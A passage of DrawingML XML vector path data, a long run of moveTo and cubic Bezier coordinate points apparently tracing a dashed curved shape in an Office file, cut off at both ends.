                    <a:pt x="1746" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1741" y="237"/>
                    <a:pt x="1736" y="233"/>
                    <a:pt x="1730" y="229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1729" y="227"/>
                    <a:pt x="1726" y="228"/>
                    <a:pt x="1725" y="229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1723" y="231"/>
                    <a:pt x="1724" y="234"/>
                    <a:pt x="1725" y="235"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1694" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1699" y="215"/>
                    <a:pt x="1704" y="219"/>
                    <a:pt x="1710" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1711" y="224"/>
                    <a:pt x="1714" y="224"/>
                    <a:pt x="1715" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1717" y="220"/>
                    <a:pt x="1716" y="218"/>
                    <a:pt x="1714" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1709" y="212"/>
                    <a:pt x="1704" y="208"/>
                    <a:pt x="1698" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1697" y="203"/>
                    <a:pt x="1694" y="203"/>
                    <a:pt x="1693" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1691" y="207"/>
                    <a:pt x="1692" y="210"/>
                    <a:pt x="1694" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1694" y="211"/>
                    <a:pt x="1694" y="211"/>
                    <a:pt x="1694" y="211"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="188"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1666" y="192"/>
                    <a:pt x="1672" y="195"/>
                    <a:pt x="1677" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1679" y="200"/>
                    <a:pt x="1682" y="200"/>
                    <a:pt x="1683" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1684" y="196"/>
                    <a:pt x="1684" y="194"/>
                    <a:pt x="1682" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1676" y="189"/>
                    <a:pt x="1671" y="185"/>
                    <a:pt x="1665" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1664" y="180"/>
                    <a:pt x="1661" y="181"/>
                    <a:pt x="1660" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1659" y="184"/>
                    <a:pt x="1659" y="187"/>
                    <a:pt x="1661" y="188"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1627" y="166"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1633" y="170"/>
                    <a:pt x="1639" y="173"/>
                    <a:pt x="1644" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1646" y="178"/>
                    <a:pt x="1649" y="178"/>
                    <a:pt x="1650" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1651" y="174"/>
                    <a:pt x="1650" y="171"/>
                    <a:pt x="1649" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1643" y="167"/>
                    <a:pt x="1637" y="163"/>
                    <a:pt x="1632" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1630" y="158"/>
                    <a:pt x="1627" y="159"/>
                    <a:pt x="1626" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625" y="163"/>
                    <a:pt x="1625" y="165"/>
                    <a:pt x="1627" y="166"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1593" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1599" y="149"/>
                    <a:pt x="1605" y="152"/>
                    <a:pt x="1610" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1612" y="157"/>
                    <a:pt x="1615" y="156"/>
                    <a:pt x="1616" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="153"/>
                    <a:pt x="1616" y="150"/>
                    <a:pt x="1614" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1609" y="146"/>
                    <a:pt x="1603" y="142"/>
                    <a:pt x="1597" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1595" y="138"/>
                    <a:pt x="1593" y="138"/>
                    <a:pt x="1592" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1590" y="142"/>
                    <a:pt x="1591" y="145"/>
                    <a:pt x="1593" y="146"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1558" y="127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1564" y="130"/>
                    <a:pt x="1570" y="133"/>
                    <a:pt x="1576" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1577" y="137"/>
                    <a:pt x="1580" y="136"/>
                    <a:pt x="1581" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1582" y="133"/>
                    <a:pt x="1581" y="130"/>
                    <a:pt x="1579" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1573" y="126"/>
                    <a:pt x="1568" y="123"/>
                    <a:pt x="1562" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1560" y="119"/>
                    <a:pt x="1557" y="119"/>
                    <a:pt x="1556" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1555" y="123"/>
                    <a:pt x="1556" y="126"/>
                    <a:pt x="1558" y="127"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1522" y="109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="112"/>
                    <a:pt x="1534" y="115"/>
                    <a:pt x="1540" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1542" y="119"/>
                    <a:pt x="1544" y="118"/>
                    <a:pt x="1545" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1546" y="114"/>
                    <a:pt x="1546" y="111"/>
                    <a:pt x="1544" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1538" y="107"/>
                    <a:pt x="1532" y="105"/>
                    <a:pt x="1525" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1523" y="101"/>
                    <a:pt x="1521" y="102"/>
                    <a:pt x="1520" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1519" y="106"/>
                    <a:pt x="1520" y="108"/>
                    <a:pt x="1522" y="109"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1486" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1492" y="95"/>
                    <a:pt x="1498" y="98"/>
                    <a:pt x="1504" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1506" y="101"/>
                    <a:pt x="1508" y="100"/>
                    <a:pt x="1509" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1510" y="96"/>
                    <a:pt x="1509" y="94"/>
                    <a:pt x="1507" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1501" y="90"/>
                    <a:pt x="1495" y="88"/>
                    <a:pt x="1489" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1487" y="84"/>
                    <a:pt x="1484" y="85"/>
                    <a:pt x="1483" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1483" y="89"/>
                    <a:pt x="1484" y="92"/>
                    <a:pt x="1486" y="92"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1448" y="77"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1455" y="80"/>
                    <a:pt x="1461" y="82"/>
                    <a:pt x="1467" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="86"/>
                    <a:pt x="1471" y="85"/>
                    <a:pt x="1472" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1473" y="81"/>
                    <a:pt x="1472" y="78"/>
                    <a:pt x="1470" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1464" y="75"/>
                    <a:pt x="1458" y="72"/>
                    <a:pt x="1451" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1449" y="69"/>
                    <a:pt x="1447" y="70"/>
                    <a:pt x="1446" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1445" y="74"/>
                    <a:pt x="1446" y="77"/>
                    <a:pt x="1448" y="77"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1411" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="66"/>
                    <a:pt x="1423" y="68"/>
                    <a:pt x="1430" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1432" y="71"/>
                    <a:pt x="1434" y="70"/>
                    <a:pt x="1435" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1436" y="66"/>
                    <a:pt x="1435" y="64"/>
                    <a:pt x="1432" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1426" y="61"/>
                    <a:pt x="1420" y="58"/>
                    <a:pt x="1413" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1411" y="56"/>
                    <a:pt x="1409" y="57"/>
                    <a:pt x="1408" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1408" y="61"/>
                    <a:pt x="1409" y="63"/>
                    <a:pt x="1411" y="64"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1373" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1379" y="54"/>
                    <a:pt x="1385" y="56"/>
                    <a:pt x="1392" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1394" y="58"/>
                    <a:pt x="1396" y="57"/>
                    <a:pt x="1397" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1398" y="53"/>
                    <a:pt x="1396" y="51"/>
                    <a:pt x="1394" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="48"/>
                    <a:pt x="1381" y="46"/>
                    <a:pt x="1375" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1373" y="43"/>
                    <a:pt x="1371" y="45"/>
                    <a:pt x="1370" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1369" y="49"/>
                    <a:pt x="1371" y="51"/>
                    <a:pt x="1373" y="52"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1334" y="41"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1341" y="43"/>
                    <a:pt x="1347" y="44"/>
                    <a:pt x="1354" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1356" y="47"/>
                    <a:pt x="1358" y="45"/>
                    <a:pt x="1358" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1359" y="41"/>
                    <a:pt x="1358" y="39"/>
                    <a:pt x="1356" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1349" y="37"/>
                    <a:pt x="1343" y="35"/>
                    <a:pt x="1336" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1334" y="33"/>
                    <a:pt x="1332" y="34"/>
                    <a:pt x="1331" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1331" y="38"/>
                    <a:pt x="1332" y="40"/>
                    <a:pt x="1334" y="41"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1295" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="33"/>
                    <a:pt x="1308" y="35"/>
                    <a:pt x="1315" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1317" y="37"/>
                    <a:pt x="1319" y="35"/>
                    <a:pt x="1320" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1320" y="31"/>
                    <a:pt x="1319" y="29"/>
                    <a:pt x="1317" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1310" y="27"/>
                    <a:pt x="1304" y="25"/>
                    <a:pt x="1297" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1295" y="23"/>
                    <a:pt x="1293" y="25"/>
                    <a:pt x="1292" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1292" y="29"/>
                    <a:pt x="1293" y="31"/>
                    <a:pt x="1295" y="32"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1256" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1263" y="25"/>
                    <a:pt x="1269" y="26"/>
                    <a:pt x="1276" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1278" y="28"/>
                    <a:pt x="1280" y="27"/>
                    <a:pt x="1281" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="22"/>
                    <a:pt x="1280" y="20"/>
                    <a:pt x="1277" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="19"/>
                    <a:pt x="1264" y="17"/>
                    <a:pt x="1258" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1256" y="16"/>
                    <a:pt x="1253" y="17"/>
                    <a:pt x="1253" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="22"/>
                    <a:pt x="1254" y="24"/>
                    <a:pt x="1256" y="24"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1217" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1224" y="19"/>
                    <a:pt x="1230" y="20"/>
                    <a:pt x="1237" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1239" y="21"/>
                    <a:pt x="1241" y="20"/>
                    <a:pt x="1241" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1242" y="15"/>
                    <a:pt x="1240" y="13"/>
                    <a:pt x="1238" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1231" y="12"/>
                    <a:pt x="1225" y="11"/>
                    <a:pt x="1218" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1216" y="10"/>
                    <a:pt x="1214" y="11"/>
                    <a:pt x="1214" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1213" y="15"/>
                    <a:pt x="1215" y="17"/>
                    <a:pt x="1217" y="18"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1177" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1184" y="14"/>
                    <a:pt x="1191" y="14"/>
                    <a:pt x="1197" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1199" y="15"/>
                    <a:pt x="1201" y="14"/>
                    <a:pt x="1202" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1202" y="9"/>
                    <a:pt x="1200" y="7"/>
                    <a:pt x="1198" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1191" y="6"/>
                    <a:pt x="1185" y="6"/>
                    <a:pt x="1178" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1176" y="5"/>
                    <a:pt x="1174" y="6"/>
                    <a:pt x="1174" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1174" y="11"/>
                    <a:pt x="1175" y="13"/>
                    <a:pt x="1177" y="13"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1138" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1144" y="10"/>
                    <a:pt x="1151" y="11"/>
                    <a:pt x="1157" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1160" y="11"/>
                    <a:pt x="1162" y="10"/>
                    <a:pt x="1162" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1162" y="5"/>
                    <a:pt x="1160" y="3"/>
                    <a:pt x="1158" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1151" y="3"/>
                    <a:pt x="1145" y="2"/>
                    <a:pt x="1138" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1136" y="2"/>
                    <a:pt x="1134" y="3"/>
                    <a:pt x="1134" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1134" y="8"/>
                    <a:pt x="1135" y="10"/>
                    <a:pt x="1138" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1098" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="8"/>
                    <a:pt x="1111" y="8"/>
                    <a:pt x="1118" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1120" y="9"/>
                    <a:pt x="1122" y="7"/>
                    <a:pt x="1122" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1122" y="3"/>
                    <a:pt x="1120" y="1"/>
                    <a:pt x="1118" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1111" y="0"/>
                    <a:pt x="1105" y="0"/>
                    <a:pt x="1098" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1096" y="0"/>
                    <a:pt x="1094" y="2"/>
                    <a:pt x="1094" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="6"/>
                    <a:pt x="1095" y="8"/>
                    <a:pt x="1098" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1058" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061" y="8"/>
                    <a:pt x="1065" y="8"/>
                    <a:pt x="1069" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1072" y="8"/>
                    <a:pt x="1075" y="8"/>
                    <a:pt x="1078" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1080" y="8"/>
                    <a:pt x="1082" y="6"/>
                    <a:pt x="1082" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1082" y="1"/>
                    <a:pt x="1080" y="0"/>
                    <a:pt x="1078" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="0"/>
                    <a:pt x="1072" y="0"/>
                    <a:pt x="1069" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1065" y="0"/>
                    <a:pt x="1061" y="0"/>
                    <a:pt x="1058" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1055" y="0"/>
                    <a:pt x="1054" y="1"/>
                    <a:pt x="1054" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1054" y="6"/>
                    <a:pt x="1056" y="8"/>
                    <a:pt x="1058" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1058" y="8"/>
                    <a:pt x="1058" y="8"/>
                    <a:pt x="1058" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1018" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1025" y="8"/>
                    <a:pt x="1031" y="8"/>
                    <a:pt x="1038" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1040" y="8"/>
                    <a:pt x="1042" y="6"/>
                    <a:pt x="1042" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1042" y="2"/>
                    <a:pt x="1040" y="0"/>
                    <a:pt x="1038" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1031" y="0"/>
                    <a:pt x="1024" y="0"/>
                    <a:pt x="1018" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1015" y="1"/>
                    <a:pt x="1014" y="3"/>
                    <a:pt x="1014" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1014" y="7"/>
                    <a:pt x="1016" y="9"/>
                    <a:pt x="1018" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="978" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="985" y="11"/>
                    <a:pt x="991" y="10"/>
                    <a:pt x="998" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1000" y="10"/>
                    <a:pt x="1002" y="8"/>
                    <a:pt x="1002" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1002" y="3"/>
                    <a:pt x="1000" y="2"/>
                    <a:pt x="997" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="991" y="2"/>
                    <a:pt x="984" y="3"/>
                    <a:pt x="977" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="975" y="4"/>
                    <a:pt x="974" y="5"/>
                    <a:pt x="974" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="974" y="10"/>
                    <a:pt x="976" y="12"/>
                    <a:pt x="978" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="978" y="11"/>
                    <a:pt x="978" y="11"/>
                    <a:pt x="978" y="11"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="938" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="945" y="15"/>
                    <a:pt x="952" y="14"/>
                    <a:pt x="958" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="960" y="13"/>
                    <a:pt x="962" y="11"/>
                    <a:pt x="962" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="962" y="7"/>
                    <a:pt x="960" y="5"/>
                    <a:pt x="957" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="951" y="6"/>
                    <a:pt x="944" y="7"/>
                    <a:pt x="937" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="935" y="8"/>
                    <a:pt x="934" y="10"/>
                    <a:pt x="934" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="14"/>
                    <a:pt x="936" y="16"/>
                    <a:pt x="938" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="938" y="15"/>
                    <a:pt x="938" y="15"/>
                    <a:pt x="938" y="15"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="899" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="905" y="20"/>
                    <a:pt x="912" y="19"/>
                    <a:pt x="919" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="921" y="18"/>
                    <a:pt x="922" y="16"/>
                    <a:pt x="922" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="922" y="11"/>
                    <a:pt x="920" y="10"/>
                    <a:pt x="917" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="911" y="11"/>
                    <a:pt x="904" y="12"/>
                    <a:pt x="898" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="14"/>
                    <a:pt x="894" y="16"/>
                    <a:pt x="894" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="20"/>
                    <a:pt x="897" y="21"/>
                    <a:pt x="899" y="21"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="860" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="866" y="27"/>
                    <a:pt x="873" y="26"/>
                    <a:pt x="879" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="24"/>
                    <a:pt x="883" y="22"/>
                    <a:pt x="882" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="882" y="18"/>
                    <a:pt x="880" y="16"/>
                    <a:pt x="878" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="18"/>
                    <a:pt x="865" y="19"/>
                    <a:pt x="858" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="856" y="21"/>
                    <a:pt x="854" y="23"/>
                    <a:pt x="855" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="27"/>
                    <a:pt x="857" y="29"/>
                    <a:pt x="860" y="28"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="821" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="35"/>
                    <a:pt x="834" y="34"/>
                    <a:pt x="840" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="842" y="32"/>
                    <a:pt x="844" y="30"/>
                    <a:pt x="843" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="843" y="25"/>
                    <a:pt x="841" y="24"/>
                    <a:pt x="838" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="832" y="26"/>
                    <a:pt x="825" y="27"/>
                    <a:pt x="819" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="29"/>
                    <a:pt x="815" y="32"/>
                    <a:pt x="816" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="816" y="36"/>
                    <a:pt x="819" y="37"/>
                    <a:pt x="821" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="821" y="37"/>
                    <a:pt x="821" y="37"/>
                    <a:pt x="821" y="37"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="782" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="45"/>
                    <a:pt x="795" y="43"/>
                    <a:pt x="801" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="803" y="41"/>
                    <a:pt x="805" y="39"/>
                    <a:pt x="804" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="804" y="35"/>
                    <a:pt x="801" y="33"/>
                    <a:pt x="799" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="793" y="36"/>
                    <a:pt x="786" y="37"/>
                    <a:pt x="780" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="40"/>
                    <a:pt x="777" y="42"/>
                    <a:pt x="777" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="46"/>
                    <a:pt x="780" y="47"/>
                    <a:pt x="782" y="47"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="744" y="58"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="750" y="56"/>
                    <a:pt x="757" y="54"/>
                    <a:pt x="763" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="52"/>
                    <a:pt x="766" y="49"/>
                    <a:pt x="766" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="45"/>
                    <a:pt x="763" y="44"/>
                    <a:pt x="761" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="754" y="47"/>
                    <a:pt x="748" y="49"/>
                    <a:pt x="741" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="51"/>
                    <a:pt x="738" y="54"/>
                    <a:pt x="739" y="56"/>
                  </a:cubicBezTo>
